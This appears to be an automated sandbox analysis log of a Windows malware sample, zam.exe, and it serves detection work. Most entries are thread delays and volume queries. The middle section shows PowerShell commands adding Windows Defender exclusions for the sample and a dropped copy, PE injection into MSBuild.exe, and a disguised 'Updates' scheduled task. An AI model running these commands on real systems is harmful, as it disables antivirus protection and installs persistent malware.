Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596094	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595984	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595753	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595625	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595516	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595386	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595281	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595172	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595053	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594938	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594813	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594688	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594469	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594344	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594125	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 600000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599863
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599735
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599485
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599235
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598985
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598735
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598485
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598235
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598094
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597717
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597553
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597438
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597219
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597094
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596985
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596735
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596485
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596235
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595985
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595735
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595579
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595453
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595203
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595094
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594985
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594735
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594485
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594235
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 593985
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 593860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 593735
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 593610

Source: MSBuild.exe, 00000010.00000002.3721155317.0000000000E76000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlln.Xa
Source: zam.exe, 00000000.00000002.1307886582.00000000008B4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}i
Source: MSBuild.exe, 00000015.00000002.3720409842.0000000001289000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllecture=MSIL"/>

Source: C:\Users\user\Desktop\zam.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 21_2_056B7588 LdrInitializeThunk,

21_2_056B7588

Source: C:\Users\user\Desktop\zam.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\zam.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\zam.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\zam.exe"
Source: C:\Users\user\Desktop\zam.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe"
Source: C:\Users\user\Desktop\zam.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\zam.exe"	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe"	Jump to behavior

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\zam.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\zam.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A			Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\zam.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 422000	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 424000	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC8008	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 422000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 424000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: E92008	Jump to behavior

Source: C:\Users\user\Desktop\zam.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\zam.exe"	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe"	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HaNkyQWPIIzrnC" /XML "C:\Users\user\AppData\Local\Temp\tmp8F5A.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HaNkyQWPIIzrnC" /XML "C:\Users\user\AppData\Local\Temp\tmpA208.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior

Source: C:\Users\user\Desktop\zam.exe	Queries volume information: C:\Users\user\Desktop\zam.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
